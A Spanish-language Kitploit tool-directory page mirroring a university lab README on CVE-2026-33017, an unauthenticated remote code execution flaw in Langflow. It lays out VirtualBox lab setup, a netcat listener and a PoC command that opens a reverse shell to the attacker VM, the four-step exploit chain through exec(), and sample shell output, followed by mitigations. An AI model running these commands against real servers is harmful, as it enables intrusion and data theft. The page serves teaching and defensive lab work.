Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/jorrit-vm/cve-2026-33017
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónRed TeamingHerramienta de Acceso RemotoDesarrollo de PayloadsLabs y Práctica
GitHubjorrit-vm/cve-2026-33017

CVE-2026-33017

# Laboratorio educativo que demuestra RCE no autenticado en Langflow mediante CVE-2026-33017, con configuración automatizada de VM y un exploit PoC para shell inversa.

16hace 4 mesesAún no revisado
Ver Repositorio

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-33017 — Langflow RCE sin autenticación

HoGent CyberSecurity II — Netwerk Pentesting & Exploitatie (NPE)
Academiejaar 2025–2026

CVE CVSS Langflow


Resumen

Este repositorio contiene un entorno de laboratorio completo y una demostración de explotación de CVE-2026-33017, una vulnerabilidad crítica de ejecución remota de código (RCE) sin autenticación en Langflow ≤ 1.8.1.

Un atacante sin ninguna autenticación puede ejecutar código Python arbitrario en el servidor a través del endpoint /api/v1/build_public_tmp/{flow_id}/flow, debido a que la entrada del usuario se pasa directamente a exec() de Python sin sandboxing ni validación.

⚠️ Aviso legal: Este repositorio está destinado exclusivamente a fines educativos en un entorno de laboratorio controlado. Úsalo únicamente en sistemas para los que tengas permiso explícito.


Arquitectura

root@kitploit:~
┌─────────────────────────────────────────────────────┐
│                   HOST MACHINE                      │
│                                                     │
│  ┌──────────────────┐     ┌───────────────────────┐ │
│  │  Langflow-Victim │     │    Kali-Attacker      │ │
│  │  Ubuntu 22.04    │     │    Kali Linux         │ │
│  │  192.168.56.101  │◄────│    192.168.56.100     │ │
│  │  Langflow 1.8.1  │     │    PoC exploit tool   │ │
│  │  port 7860       │     │    + internet (NAT)   │ │
│  └──────────────────┘     └───────────────────────┘ │
│          Host-only netwerk: 192.168.56.0/24         │
└─────────────────────────────────────────────────────┘

Estructura del repositorio

root@kitploit:~
CVE-2026-33017/
├── README.md # Este archivo
├── LICENSE
├── .gitignore
├── docs/
│ └── stappenplan.md # Guía completa de despliegue y ataque
└── scripts/
├── setup_vms.sh # Fase 1: Crear VMs de VirtualBox (HOST)
├── setup_victim.sh # Fase 2: Instalar Langflow 1.8.1 (VM Ubuntu)
└── setup_attacker.sh # Fase 3: Instalar herramienta PoC (VM Kali)

Inicio rápido

Requisitos

  • VirtualBox 7.x con VBoxManage en PATH
  • Ubuntu_22.04-VB-64bit.vdi → renombrar a ubuntu-22.04.vdi
  • Kali_Linux-VB-64bit.vdi → renombrar a kali-linux.vdi
  • Ambos archivos VDI en la misma carpeta que setup_vms.sh

Fase 1 — Crear las VMs (en el host)

root@kitploit:~
bash scripts/setup_vms.sh

Fase 2 — Configurar la VM víctima (en la VM Ubuntu)

root@kitploit:~
# Credenciales: osboxes / osboxes.org
sudo bash scripts/setup_victim.sh

Fase 3 — Configurar la VM atacante (en la VM Kali)

root@kitploit:~
# Credenciales: osboxes / osboxes.org
sudo bash scripts/setup_attacker.sh

Ejecutar el ataque

Terminal 1 — Listener de reverse shell:

root@kitploit:~
nc -lvnp 4444

Terminal 2 — Exploit:

root@kitploit:~
cd ~/CVE-2026-33017-Langflow-RCE-PoC
source venv/bin/activate
python3 cve-2026-33017.py 192.168.56.101 --shell \
  --lhost 192.168.56.100 --lport 4444

El PoC se instala automáticamente mediante setup_attacker.sh.
PoC utilizado: omer-efe-curkus/CVE-2026-33017-Langflow-RCE-PoC


Cómo funciona el exploit

PasoEndpointDescripción
1GET /api/v1/auto_loginObtiene el token JWT de superusuario (AUTO_LOGIN=true)
2POST /api/v1/flows/Crea un nuevo flujo público a través de la API
3POST /api/v1/build_public_tmp/{id}/flowInyecta un CustomComponent con código Python malicioso
4exec() en validate.py:397El código se ejecuta sin sandboxing — RCE

Prueba de ejecución

[] Fetching access token... [+] Public Flow ID created: 11571add-6416-4226-b8e6-844202cce6ff [] Sending reverse shell to connect back to 192.168.56.100:4444

Listener (Terminal 1): connect to [192.168.56.100] from (UNKNOWN) [192.168.56.101] 36160 $ whoami user $ hostname e37190a2f147 $ find /app -name "*.db" /app/.venv/lib/python3.12/site-packages/langflow/langflow.db


Mitigación

  • Actualizar a Langflow ≥ 1.9.0 — elimina el parámetro data vulnerable
  • Desactivar LANGFLOW_AUTO_LOGIN en producción
  • Restringir el acceso de red al puerto 7860 mediante firewall
  • Colocar Langflow detrás de un proxy inverso con autenticación

Referencias

  • NVD — CVE-2026-33017
  • GitHub Advisory GHSA-vwmf-pq79-vjvx
  • Sysdig — Exploited in 20 hours
  • SonicWall — Technical Analysis
  • PoC door omer-efe-curkus

HoGent — Toegepaste Informatica — CyberSecurity II — 2025–2026

Descargar herramienta